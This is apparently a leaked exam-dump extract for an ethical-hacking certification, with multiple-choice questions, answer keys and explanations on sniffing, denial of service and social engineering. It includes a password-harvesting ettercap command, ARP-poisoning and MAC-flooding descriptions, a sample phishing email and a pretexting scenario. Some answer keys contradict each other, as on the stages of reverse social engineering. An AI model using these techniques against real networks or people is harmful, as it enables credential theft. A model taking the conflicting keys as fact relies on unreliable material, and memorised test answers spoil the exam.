1. Download Registry Repair from: www.reg-patch.com
2. Install Registry Repair
3. Run Registry Repair
4. Reboot your computer
FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION!
What would you infer from this alert?
A. The machine is redirecting traffic to www.reg-patch.com using adware
B. It is a genuine fault of windows registry and the registry needs to be backed up
C. An attacker has compromised the machine and backdoored ports 1026 and 1027
D. It is a messenger spam. Windows creates a listener on one of the low dynamic ports from 1026 to 1029 and the message usually promotes malware disguised as legitimate utilities Answer: D
Explanation: The "net send" Messenger service can be used by unauthorized users of your computer, without gaining any kind of privileged access, to cause a pop-up window to appear on your computer. Lately, this feature has been used by unsolicited commercial advertisers to inform many campus users about a
"university diploma service"...
QUESTION 195:
Exhibit:
ettercap -NCLzs --quiet
What does the command in the exhibit do in "Ettercap"?
A. This command will provide you the entire list of hosts in the LAN
B. This command will check if someone is poisoning you and will report its IP.
C. This command will detach from console and log all the collected passwords from the network to a file.
Actualtests.com - The Power of Knowing

312-50
D. This command broadcasts ping to scan the LAN instead of ARP request of all the subnet IPs.
Answer: C
Explanation:
-N = NON interactive mode (without ncurses)
-C = collect all users and passwords
-L = if used with -C (collector) it creates a file with all the password sniffed in the session in the form "YYYYMMDD-collected-pass.log"
-z = start in silent mode (no arp storm on start up)
-s = IP BASED sniffing
--quiet = "demonize" ettercap. Useful if you want to log all data in background.
QUESTION 196:
A remote user tries to login to a secure network using Telnet, but accidently types in an invalid user name or password. Which responses would NOT be preferred by an experienced Security Manager? (multiple answer)
A. Invalid Username
B. Invalid Password
C. Authentication Failure
D. Login Attempt Failed
E. Access Denied
Answer: A, B
Explanation:
As little information as possible should be given about a failed login attempt. Invalid username or password is not desirable.
QUESTION 197:
A POP3 client contacts the POP3 server:
A. To send mail
B. To receive mail
C. to send and receive mail
D. to get the address to send mail to
E. initiate a UDP SMTP connection to read mail
Answer: B
POP is used to receive e-mail.
SMTP is used to send e-mail.

Actualtests.com - The Power of Knowing

312-50
QUESTION 198:
Samantha was hired to perform an internal security test of Certkiller . She quickly realized that all networks are making use of switches instead of traditional hubs.
This greatly limits her ability to gather information through network sniffing.
Which of the following techniques can she use to gather information from the switched network or to disable some of the traffic isolation features of the switch?
(Choose two)
A. Ethernet Zapping
B. MAC Flooding
C. Sniffing in promiscuous mode
D. ARP Spoofing
Answer: B, D
Explanation: In a typical MAC flooding attack, a switch is flooded with packets, each containing different source MAC addresses. The intention is to consume the limited memory set aside in the switch to store the MAC address-to-physical port translation table.The result of this attack causes the switch to enter a state called failopen mode, in which all incoming packets are broadcast out on all ports (as with a hub), instead of just down the correct port as per normal operation. The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN.
These frames contain false MAC addresses, confusing network devices, such as network switches. As a result frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or an unreachable host (a denial of service attack).
QUESTION 199:
Ethereal works best on ____________.
A. Switched networks
B. Linux platforms
C. Networks using hubs
D. Windows platforms
E. LAN's
Answer: C
Explanation: Ethereal is used for sniffing traffic. It will return the best results when used on an unswitched (i.e. hub. network.
QUESTION 200:
The follows is an email header. What address is that of the true originator of the
Actualtests.com - The Power of Knowing

312-50 message? Return-Path:
Received: from smtp.com (fw.emumail.com [215.52.220.122]. by raq-221-181.ev1.net (8.10.2/8.10.2. with ESMTP id h78NIn404807 for ; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network.; 8 Aug 2003 23:25:25 -0000
Received: from ([19.25.19.10]. by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP. (168.150.84.123. by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates"
To: "mikeg"
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID:
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0052_01C35DE1.03202950" X-Priority: 3 (Normal.
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
A. 19.25.19.10
B. 51.32.123.21
C. 168.150.84.123
D. 215.52.220.122
E. 8.10.2/8.10.2
Answer: C
Explanation: Spoofing can be easily achieved by manipulating the "from" name field, however, it is much more difficult to hide the true source address. The
"received from" IP address 168.150.84.123 is the true source of the
QUESTION 201:
Bob wants to prevent attackers from sniffing his passwords on the wired network.
Which of the following lists the best options?
A. RSA, LSA, POP
B. SSID, WEP, Kerberos
C. SMB, SMTP, Smart card
D. Kerberos, Smart card, Stanford SRP

Actualtests.com - The Power of Knowing

312-50
Answer: D
Explanation: Kerberos, Smart cards and Stanford SRP are techniques where the password never leaves the computer.
QUESTION 202:
Which tool/utility can help you extract the application layer data from each TCP connection from a log file into separate files?
A. Snort
B. argus
C. TCPflow
D. Tcpdump
Answer: C
Explanation: Tcpflow is a program that captures data transmitted as part of TCP connections (flows), and stores the data in a way that is convenient for protocol analysis or debugging. A program like 'tcpdump' shows a summary of packets seen on the wire, but usually doesn't store the data that's actually being transmitted. In contrast, tcpflow reconstructs the actual data streams and stores each flow in a separate file for later analysis.
QUESTION 203:
Which of the following display filters will you enable in Ethereal to view the three-way handshake for a connection from host 192.168.0.1?
A. ip == 192.168.0.1 and tcp.syn
B. ip.addr = 192.168.0.1 and syn = 1
C. ip.addr==192.168.0.1 and tcp.flags.syn
D. ip.equals 192.168.0.1 and syn.equals on
Answer: C
QUESTION 204:
John the hacker is sniffing the network to inject ARP packets. He injects broadcast frames onto the wire to conduct MiTM attack. What is the destination MAC address of a broadcast frame?
A. 0xFFFFFFFFFFFF
B. 0xAAAAAAAAAAAA
C. 0xBBBBBBBBBBBB
D. 0xDDDDDDDDDDDD
Actualtests.com - The Power of Knowing

312-50

Answer: A
Explanation: 0xFFFFFFFFFFFF is the destination MAC address of the broadcast frame. QUESTION 205:
When Jason moves a file via NFS over the company's network, you want to grab a copy of it by sniffing. Which of the following tool accomplishes this?
A. macof
B. webspy
C. filesnarf
D. nfscopy
Answer: C
Explanation: Filesnarf - sniff files from NFS trafficOPTIONS
-i interface
Specify the interface to listen on.
-v "Versus" mode. Invert the sense of matching, to select non-matching files. pattern Specify regular expression for filename matching. expression Specify a tcpdump(8) filter expression to select traffic to sniff.
SEE ALSO
Dsniff, nfsd
QUESTION 206:
What port number is used by Kerberos protocol?
A. 44
B. 88
C. 419
D. 487
Answer: B
Explanation: Kerberos traffic uses UDP/TCP protocol source and destination port
88.

Actualtests.com - The Power of Knowing

312-50
QUESTION 207:
Which of the following is not considered to be a part of active sniffing?
A. MAC Flooding
B. ARP Spoofing
C. SMAC Fueling
D. MAC Duplicating
Answer: C
QUESTION 208:
What is the command used to create a binary log file using tcpdump?
A. tcpdump -r log
B. tcpdump -w ./log
C. tcpdump -vde -r log
D. tcpdump -l /var/log/
Answer: B
Explanation: tcpdump [ -adeflnNOpqStvx ] [ -c count ] [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ] [ expression ]
-w Write the raw packets to file rather than parsing and printing them out.
QUESTION 209:
ARP poisoning is achieved in _____ steps
A. 1
B. 2
C. 3
D. 4
Answer: B
Explanation: The hacker begins by sending a malicious ARP "reply" (for which there was no previous request) to your router, associating his computer's MAC address with your IP Address. Now your router thinks the hacker's computer is your computer. Next, the hacker sends a malicious ARP reply to your computer, associating his MAC Address with the routers IP Address. Now your machine thinks the hacker's computer is your router. The hacker has now used ARP poisoning to accomplish a MitM attack.

Actualtests.com - The Power of Knowing

312-50
QUESTION 210:
How would you describe a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDS's on a network?
A. Covert Channel
B. Crafted Channel
C. Bounce Channel
D. Deceptive Channel
Answer: A
Explanation: A covert channel is described as: "any communication channel that can be exploited by a process to transfer information in a manner that violates the systems security policy." Essentially, it is a method of communication that is not part of an actual computer system design, but can be used to transfer information to users or system processes that normally would not be allowed access to the information. QUESTION 211:
Exhibit:

You have captured some packets in Ethereal. You want to view only packets sent
Actualtests.com - The Power of Knowing

312-50 from 10.0.0.22. What filter will you apply?
A. ip = 10.0.0.22
B. ip.src == 10.0.0.22
C. ip.equals 10.0.0.22
D. ip.address = 10.0.0.22
Answer: B
Explanation: ip.src tells the filter to only show packets with 10.0.0.22 as the source.
QUESTION 212:
Certkiller, the evil hacker, is purposely sending fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes. From the information given, what type of attack is Certkiller attempting to perform? A. Syn flood
B. Smurf
C. Ping of death
D. Fraggle
Answer: C
Reference: http://insecure.org/sploits/ping-o-death.html
QUESTION 213:
Which one of the following instigates a SYN flood attack?
A. Generating excessive broadcast packets.
B. Creating a high number of half-open connections.
C. Inserting repetitive Internet Relay Chat (IRC) messages.
D. A large number of Internet Control Message Protocol (ICMP) traces.
Answer: B
Explanation: A SYN attack occurs when an attacker exploits the use of the buffer space during a Transmission Control Protocol (TCP) session initialization handshake. The attacker floods the target system's small "in-process" queue with connection requests, but it does not respond when a target system replies to those requests. This causes the target system to time out while waiting for the proper response, which makes the system crash or become unusable.
QUESTION 214:

Actualtests.com - The Power of Knowing

312-50
Global deployment of RFC 2827 would help mitigate what classification of attack?
A. Sniffing attack
B. Denial of service attack
C. Spoofing attack
D. Reconnaissance attack
E. Prot Scan attack
Answer: C
Explanation:
RFC 2827 - Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing
QUESTION 215:
What happens when one experiences a ping of death?
A. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP) and the "type" field in the ICMP header is set to 18 (Address Mask Reply).
B. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP), the Last Fragment bit is set, and (IP offset ' 8) + (IP data length) >65535.
In other words, the IP offset (which represents the starting position of this fragment in the original packet, and which is in 8-byte units) plus the rest of the packet is greater than the maximum size for an IP packet.
C. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP) and the source equal to destination address.
D. This is when an the IP header is set to 1 (ICMP) and the "type" field in the ICMP header is set to 5 (Redirect).
Answer: B
Explanation:
A hacker can send an IP packet to a vulnerable machine such that the last fragment contains an offest where (IP offset *8) + (IP data length)>65535. This means that when the packet is reassembled, its total length is larger than the legal limit, causing buffer overruns in the machine's OS (becouse the buffer sizes are defined only to accomodate the maximum allowed size of the packet based on RFC 791)...IDS can generally recongize such attacks by looking for packet fragments that have the IP header's protocol field set to 1 (ICMP), the last bit set, and (IP offset *8) +(IP data length)>65535" CCIE
Professional Development Network Security Principles and Practices by Saadat Malik pg
414 "Ping of Death" attacks cause systems to react in an unpredictable fashion when receiving oversized IP packets. TCP/IP allows for a maximum packet size of up to 65536 octets (1 octet = 8 bits of data), containing a minimum of 20 octets of IP header information and zero or more octets of optional information, with the rest of the packet being data. Ping of Death attacks can cause crashing, freezing, and rebooting.
Actualtests.com - The Power of Knowing

312-50

QUESTION 216:
Which one of the following network attacks takes advantages of weaknesses in the fragment reassembly functionality of the TCP/IP protocol stack?
A. Teardrop
B. Smurf
C. Ping of Death
D. SYN flood
E. SNMP Attack
Answer: A
Explanation:
The teardrop attack uses overlapping packet fragments to confuse a target system and cause the system to reboot or crash.
QUESTION 217:
A denial of Service (DoS) attack works on the following principle:
A. MS-DOS and PC-DOS operating system utilize a weaknesses that can be compromised and permit them to launch an attack easily.
B. All CLIENT systems have TCP/IP stack implementation weakness that can be compromised and permit them to lunch an attack easily.
C. Overloaded buffer systems can easily address error conditions and respond appropriately. D. Host systems cannot respond to real traffic, if they have an overwhelming number of incomplete connections (SYN/RCVD State).
E. A server stops accepting connections from certain networks one those network become flooded. Answer: D
Explanation: Denial-of-service (often abbreviated as DoS) is a class of attacks in which an attacker attempts to prevent legitimate users from accessing an Internet service, such as a web site. This can be done by exercising a software bug that causes the software running the service to fail (such as the "Ping of Death" attack against
Windows NT systems), sending enough data to consume all available network bandwidth (as in the May, 2001 attacks against Gibson Research), or sending data in such a way as to consume a particular resource needed by the service.
QUESTION 218:
What happens during a SYN flood attack?
Actualtests.com - The Power of Knowing

312-50

A. TCP connection requests floods a target machine is flooded with randomized source address & ports for the TCP ports.
B. A TCP SYN packet, which is a connection initiation, is sent to a target machine, giving the target host's address as both source and destination, and is using the same port on the target host as both source and destination.
C. A TCP packet is received with the FIN bit set but with no ACK bit set in the flags field. D. A TCP packet is received with both the SYN and the FIN bits set in the flags field.
Answer: A
Explanation:
To a server that requires an exchange of a sequence of messages. The client system begins by sending a SYN message to the server. The server then acknowledges the SYN message by sending a SYN-ACK message to the client. The client then finishes establishing the connection by responding with an ACK message and then data can be exchanged. At the point where the server system has sent an acknowledgment
(SYN-ACK) back to client but has not yet received the ACK message, there is a half-open connection. A data structure describing all pending connections is in memory of the server that can be made to overflow by intentionally creating too many partially open connections. Another common attack is the SYN flood, in which a target machine is flooded with TCP connection requests. The source addresses and source TCP ports of the connection request packets are randomized; the purpose is to force the target host to maintain state information for many connections that will never be completed. SYN flood attacks are usually noticed because the target host (frequently an HTTP or SMTP server) becomes extremely slow, crashes, or hangs. It's also possible for the traffic returned from the target host to cause trouble on routers; because this return traffic goes to the randomized source addresses of the original packets, it lacks the locality properties of
"real" IP traffic, and may overflow route caches. On Cisco routers, this problem often manifests itself in the router running out of memory.
QUESTION 219:
What is the term 8 to describe an attack that falsifies a broadcast ICMP echo request and includes a primary and secondary victim?
A. Fraggle Attack
B. Man in the Middle Attack
C. Trojan Horse Attack
D. Smurf Attack
E. Back Orifice Attack
Answer: D
Explanation:
Actualtests.com - The Power of Knowing

312-50
Trojan and Back orifice are Trojan horse attacks. Man in the middle spoofs the Ip and redirects the victems packets to the cracker The infamous Smurf attack. preys on ICMP's capability to send traffic to the broadcast address. Many hosts can listen and respond to a single ICMP echo request sent to a broadcast address.
Network Intrusion Detection third Edition by Stephen Northcutt and Judy Novak pg 70
The "smurf" attack's cousin is called "fraggle", which uses UDP echo packets in the same fashion as the ICMP echo packets; it was a simple re-write of "smurf".
QUESTION 220:
What is the goal of a Denial of Service Attack?
A. Capture files from a remote computer.
B. Render a network or computer incapable of providing normal service.
C. Exploit a weakness in the TCP stack.
D. Execute service at PS 1009.
Answer: B
Explanation: In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the
Internet proper use policy as indicated by the Internet Architecture Board (IAB).
QUESTION 221:
What do you call a system where users need to remember only one username and password, and be authenticated for multiple services?
A. Simple Sign-on
B. Unique Sign-on
C. Single Sign-on
D. Digital Certificate
Answer: C
Explanation: Single sign-on (SSO) is a specialized form of software authentication that enables a user to authenticate once and gain access to the resources of multiple software systems.
QUESTION 222:
Clive has been monitoring his IDS and sees that there are a huge number of ICMP
Echo Reply packets that are being received on the external gateway interface.
Further inspection reveals that they are not responses from the internal hosts'
Actualtests.com - The Power of Knowing

312-50 requests but simply responses coming from the Internet.
What could be the most likely cause?
A. Someone has spoofed Clive's IP address while doing a smurf attack.
B. Someone has spoofed Clive's IP address while doing a land attack.
C. Someone has spoofed Clive's IP address while doing a fraggle attack.
D. Someone has spoofed Clive's IP address while doing a DoS attack.
Answer: A
Explanation: The smurf attack, named after its exploit program, is a denial-of-service attack that uses spoofed broadcast ping messages to flood a target system. In such an attack, a perpetrator sends a large amount of ICMP echo (ping) traffic to IP broadcast addresses, all of it having a spoofed source address of the intended victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, hundreds of machines might reply to each packet.
QUESTION 223:
What would best be defined as a security test on services against a known vulnerability database using an automated tool?
A. A penetration test
B. A privacy review
C. A server audit
D. A vulnerability assessment
Answer: D
Explanation: Vulnerability assessment is the process of identifying and quantifying vulnerabilities in a system. The system being studied could be a physical facility like a nuclear power plant, a computer system, or a larger system (for example the communications infrastructure or water infrastructure of a region).
QUESTION 224:
A Buffer Overflow attack involves:
A. Using a trojan program to direct data traffic to the target host's memory stack
B. Flooding the target network buffers with data traffic to reduce the bandwidth available to legitimate users
C. Using a dictionary to crack password buffers by guessing user names and passwords
D. Poorly written software that allows an attacker to execute arbitrary code on a target
Actualtests.com - The Power of Knowing

312-50 system Answer: D
Explanation:
B is a denial of service. By flooding the data buffer in an application with trash you could get access to write in the code segment in the application and that way insert your own code. QUESTION 225:
How does a denial-of-service attack work?
A. A hacker tries to decipher a password by using a system, which subsequently crashes the network
B. A hacker attempts to imitate a legitimate user by confusing a computer or even another person
C. A hacker prevents a legitimate user (or group of users) from accessing a service
D. A hacker uses every character, word, or letter he or she can think of to defeat authentication Answer: C
Explanation: In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the
Internet proper use policy as indicated by the Internet Architecture Board (IAB).
QUESTION 226:
When working with Windows systems, what is the RID of the true administrator account? A. 500
B. 501
C. 512
D. 1001
E. 1024
F. 1000
Answer: A
Explanation: The built-in administrator account always has a RID of 500.

Actualtests.com - The Power of Knowing

312-50
QUESTION 227:
If you send a SYN to an open port, what is the correct response?(Choose all correct answers. A. SYN
B. ACK
C. FIN
D. PSH
Answer: A, B
Explanation: The proper response is a SYN / ACK. This technique is also known as half-open scanning.
QUESTION 228:
When working with Windows systems, what is the RID of the true administrator account? A. 500
B. 501
C. 1000
D. 1001
E. 1024
F. 512
Answer: A
Explanation: Because of the way in which Windows functions, the true administrator account always has a RID of 500.
QUESTION 229:
You have been called to investigate a sudden increase in network traffic at
Certkiller . It seems that the traffic generated was too heavy that normal business functions could no longer be rendered to external employees and clients. After a quick investigation, you find that the computer has services running attached to
TFN2k and Trinoo software. What do you think was the most likely cause behind this sudden increase in traffic?
A. A distributed denial of service attack.
B. A network card that was jabbering.
C. A bad route on the firewall.
D. Invalid rules entry at the gateway.

Actualtests.com - The Power of Knowing

312-50
Answer: A
Explanation: In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the
Internet proper use policy as indicated by the Internet Architecture Board (IAB).
TFN2K and Trinoo are tools used for conducting DDos attacks.
QUESTION 230:
SYN Flood is a DOS attack in which an attacker deliberately violates the three-way handshake and opens a large number of half-open TCP connections.
The signature for SYN Flood attack is:
A. The source and destination address having the same value.
B. The source and destination port numbers having the same value.
C. A large number of SYN packets appearing on a network without the corresponding reply packets.
D. A large number of SYN packets appearing on a network with the corresponding reply packets. Answer: C
Explanation: A SYN attack occurs when an attacker exploits the use of the buffer space during a Transmission Control Protocol (TCP) session initialization handshake. The attacker floods the target system's small "in-process" queue with connection requests, but it does not respond when a target system replies to those requests. This causes the target system to time out while waiting for the proper response, which makes the system crash or become unusable.
QUESTION 231:
Henry is an attacker and wants to gain control of a system and use it to flood a target system with requests, so as to prevent legitimate users from gaining access.
What type of attack is Henry using?
A. Henry is executing commands or viewing data outside the intended target path
B. Henry is using a denial of service attack which is a valid threat used by an attacker
C. Henry is taking advantage of an incorrect configuration that leads to access with higher-than-expected privilege
D. Henry uses poorly designed input validation routines to create or alter commands to gain access to unintended data or execute commands
Answer: B

Actualtests.com - The Power of Knowing

312-50
Explanation: Henry's intention is to perform a DoS attack against his target, possibly a DDoS attack. He uses systems other than his own to perform the attack in order to cover the tracks back to him and to get more "punch" in the DoS attack if he uses multiple systems.
QUESTION 232:
Eve decides to get her hands dirty and tries out a Denial of Service attack that is relatively new to her. This time she envisages using a different kind of method to attack Brownies Inc. Eve tries to forge the packets and uses the broadcast address.
She launches an attack similar to that of fraggle. What is the technique that Eve used in the case above?
A. Smurf
B. Bubonic
C. SYN Flood
D. Ping of Death
Answer: A
Explanation: A fraggle attack is a variation of the smurf attack for denial of service in which the attacker sends spoofed UDP packets instead of ICMP echo reply (ping) packets to the broadcast address of a large network.
QUESTION 233:
Peter is a Network Admin. He is concerned that his network is vulnerable to a smurf attack. What should Peter do to prevent a smurf attack?
Select the best answer.
A. He should disable unicast on all routers
B. Disable multicast on the router
C. Turn off fragmentation on his router
D. Make sure all anti-virus protection is updated on all systems
E. Make sure his router won't take a directed broadcast
Answer: E
Explanations:
Unicasts are one-to-one IP transmissions, by disabling this he would disable most network transmissions but still not prevent the smurf attack. Turning of multicast or fragmentation on the router has nothing to do with Peter's concerns as a smurf attack uses broadcast, not multicast and has nothing to do with fragmentation. Anti-virus protection will not help prevent a smurf attack. A smurf attack is a broadcast from a spoofed source.
If directed broadcasts are enabled on the destination all the computers at the destination will respond to the spoofed source, which is really the victim. Disabling directed broadcasts on a router can prevent the attack.
Actualtests.com - The Power of Knowing

312-50

QUESTION 234:
Your boss at Certkiller .com asks you what are the three stages of Reverse Social
Engineering.
A. Sabotage, advertising, Assisting
B. Sabotage, Advertising, Covering
C. Sabotage, Assisting, Billing
D. Sabotage, Advertising, Covering
Answer: A
Explanation: Typical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.
QUESTION 235:
Why is Social Engineering considered attractive by hackers and also adopted by experts in the field?
A. It is done by well known hackers and in movies as well.
B. It does not require a computer in order to commit a crime.
C. It is easy and extremely effective to gain information.
D. It is not considered illegal.
Answer: C
Explanation: Social engineering is a collection of techniques used to manipulate people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery for information gathering or computer system access and in most (but not all) cases the attacker never comes face-to-face with the victim. The term has been popularized in recent years by well known (reformed) computer criminal and security consultant
Kevin Mitnick who points out that it's much easier to trick someone into giving you his or her password for a system than to spend the effort to hack in. He claims it to be the single most effective method in his arsenal.
QUESTION 236:
What is the most common vehicle for social engineering attacks?
A. Phone
Actualtests.com - The Power of Knowing

312-50
B. Email
C. In person
D. P2P Networks
Answer: A
Explanation: Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.
QUESTION 237:
Jack Hacker wants to break into Certkiller 's computers and obtain their secret double fudge cookie recipe. Jacks calls Jane, an accountant at Certkiller pretending to be an administrator from Certkiller . Jack tells Jane that there has been a problem with some accounts and asks her to verify her password with him "just to double check our records". Jane does not suspect anything amiss, and parts with her password. Jack can now access Certkiller 's computers with a valid user name and password, to steal the cookie recipe.
What kind of attack is being illustrated here? (Choose the best answer)
A. Reverse Psychology
B. Reverse Engineering
C. Social Engineering
D. Spoofing Identity
E. Faking Identity
Answer: C
Explanation: This is a typical case of pretexting. Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.
QUESTION 238:
Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password 'just to double check our records'. Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'s computers, to find the cookie recipe. This is an example of what kind of attack?
A. Reverse Psychology
B. Social Engineering
C. Reverse Engineering
Actualtests.com - The Power of Knowing

312-50
D. Spoofing Identity
E. Faking Identity
Answer: B
Explanation: This is a typical case of pretexting. Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.
QUESTION 239:
Usernames, passwords, e-mail addresses, and the location of CGI scripts may be obtained from which of the following information sources?
A. Company web site
B. Search engines
C. EDGAR Database query
D. Whois query
Answer: A
Explanation: Whois query would not enable us to find the CGI scripts whereas in the actual website, some of them will have scripts written to make the website more user friendly. The EDGAR database would in fact give us a lot of the information requested but not the location of CGI scripts, as would a simple search engine on the Internet if you have the time needed.
QUESTION 240:
What are the six types of social engineering?(Choose six).
A. Spoofing
B. Reciprocation
C. Social Validation
D. Commitment
E. Friendship
F. Scarcity
G. Authority
H. Accountability
Answer: B, C, D, E, F, G
Explanation: All social engineering is performed by taking advantage of human nature. For in-depth information on the subject review, read Robert Cialdini's book, Influence: Science and Practice.

Actualtests.com - The Power of Knowing

312-50
QUESTION 241:
What does the following command achieve?
Telnet
HEAD /HTTP/1.0

A. This command returns the home page for the IP address specified
B. This command opens a backdoor Telnet session to the IP address specified
C. This command returns the banner of the website specified by IP address
D. This command allows a hacker to determine the sites security
E. This command is bogus and will accomplish nothing
Answer: C
Explanation: This command is used for banner grabbing. Banner grabbing helps identify the service and version of web server running.
QUESTION 242:
Within the context of Computer Security, which of the following statements best describe Social Engineering?
A. Social Engineering is the act of publicly disclosing information.
B. Social Engineering is the act of getting needed information from a person rather than breaking into a system.
C. Social Engineering is the means put in place by human resource to perform time accounting. D. Social Engineering is a training program within sociology studies.
Answer: B
Explanation: Social engineering is a collection of techniques used to manipulate people into performing actions or divulging confidential information.
QUESTION 243:
Bob waits near a secured door, holding a box. He waits until an employee walks up to the secured door and uses the special card in order to access the restricted area of the target company. Just as the employee opens the door, Bob walks up to the employee (still holding the box) and asks the employee to hold the door open so that he can enter. What is the best way to undermine the social engineering activity of tailgating? A. issue special cards to access secured doors at the company and provide a one-time
Actualtests.com - The Power of Knowing

312-50 only brief description of use of the special card
B. to post a sign that states "no tailgating" next to the special card reader adjacent to the secured door
C. setup a mock video camera next to the special card reader adjacent to the secured door
D. to educate all of the employees of the company on best security practices on a recurring basis
Answer: D
Explanation: Tailgating will not work in small company's where everyone knows everyone, and neither will it work in very large companies where everyone is required to swipe a card to pass, but it's a very simple and effective social engineering attack against mid-sized companies where it's common for one employee not to know everyone. There is two ways of stop this attack either by buying expensive perimeter defense in form of gates that only let on employee pass at every swipe of a card or by educating every employee on a recurring basis.
QUESTION 244:
Jake works as a system administrator at Acme Corp. Jason, an accountant of the firm befriends him at the canteen and tags along with him on the pretext of appraising him about potential tax benefits. Jason waits for Jake to swipe his access card and follows him through the open door into the secure systems area. How would you describe Jason's behavior within a security context?
A. Trailing
B. Tailgating
C. Swipe Gating
D. Smooth Talking
Answer: B
Explanation: Tailgating, in which an unauthorized person follows someone with a pass into an office, is a very simple social engineering attack. The intruder opens the door, which the authorized user walks through, and then engages them in conversation about the weather or weekend sport while they walk past the reception area together.
QUESTION 245:
Study the following e-mail message. When the link in the message is clicked, it will take you to an address like: http://hacker.xsecurity.com/in.htm. Note that hacker.xsecurity.com is not an official SuperShopper site!
What attack is depicted in the below e-mail?
Dear SuperShopper valued member,
Due to concerns, for the safety and integrity of the SuperShopper community we
Actualtests.com - The Power of Knowing

312-50 have issued this warning message. It has come to our attention that your account information needs to be updated due to inactive members, frauds and spoof reports.
If you could please take 5-10 minutes out of your online experience and renew your records you will not run into any future problems with the online service. However, failure to update your records will result to your account cancellation. This notification expires within 24 hours.
Once you have updated your account records your SuperShopper will not be interrupted and will continue as normal.
Please follow the link below and renew your account information. https://www.supershopper.com/cgi-bin/webscr?cmd=update-run SuperShopper Technical Support http://www.supershopper.com
A. Phishing attack
B. E-mail spoofing
C. social engineering
D. Man in the middle attack
Answer: A
Explanation: Phishing is a criminal activity using social engineering techniques.
Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out using email or an instant message, although phone contact has been used as well.
QUESTION 246:
A majority of attacks come from insiders, people who have direct access to a company's computer system as part of their job function or a business relationship.
Who is considered an insider?
A. The CEO of the company because he has access to all of the computer systems
B. A government agency since they know the company computer system strengths and weaknesses C. Disgruntled employee, customers, suppliers, vendors, business partners, contractors, temps, and consultants
D. A competitor to the company because they can directly benefit from the publicity generated by making such an attack
Answer: C
Explanation: An insider is anyone who already has an foot inside one way or another. QUESTION 247:

Actualtests.com - The Power of Knowing

312-50
Which type of hacker represents the highest risk to your network?
A. script kiddies
B. grey hat hackers
C. black hat hackers
D. disgruntled employees
Answer: D
Explanation: The disgruntled users have some permission on your database, versus a hacker who might not get into the database. Global Crossings is a good example of how a disgruntled employee -- who took the internal payroll database home on a hard drive -- caused big problems for the telecommunications company. The employee posted the names, Social Security numbers and birthdates of company employees on his Web site. He may have been one of the factors that helped put them out of business.
QUESTION 248:
Sabotage, Advertising and Covering are the three stages of _____
A. Social engineering
B. Reverse Social Engineering
C. Reverse Software Engineering
D. Rapid Development Engineering
Answer: B
Explanation: Typical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.
QUESTION 249:
Dave has been assigned to test the network security of Acme Corp. The test was announced to the employees. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a sand clock to mark the progress of the test. Dave successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access. How was security compromised and how did the firewall respond?
A. The attack did not fall through as the firewall blocked the traffic
B. The attack was social engineering and the firewall did not detect it
Actualtests.com - The Power of Knowing

312-50
C. The attack was deception and security was not directly compromised
D. Security was not compromised as the webpage was hosted internally
Answer: B
Explanation: This was just another way to trick the information out of the users without the need to hack into any systems. All traffic is outgoing and initiated by the user so the firewall will not react.
QUESTION 250:
Which of these are phases of a reverse social engineering attack?
Select the best answers.
A. Sabotage
B. Assisting
C. Deceiving
D. Advertising
E. Manipulating
Answer: A, B, D
Explanations:
According to "Methods of Hacking: Social
Engineering", by Rick Nelson, the three phases of reverse social engineering attacks are sabotage, advertising, and assisting.
QUESTION 251:
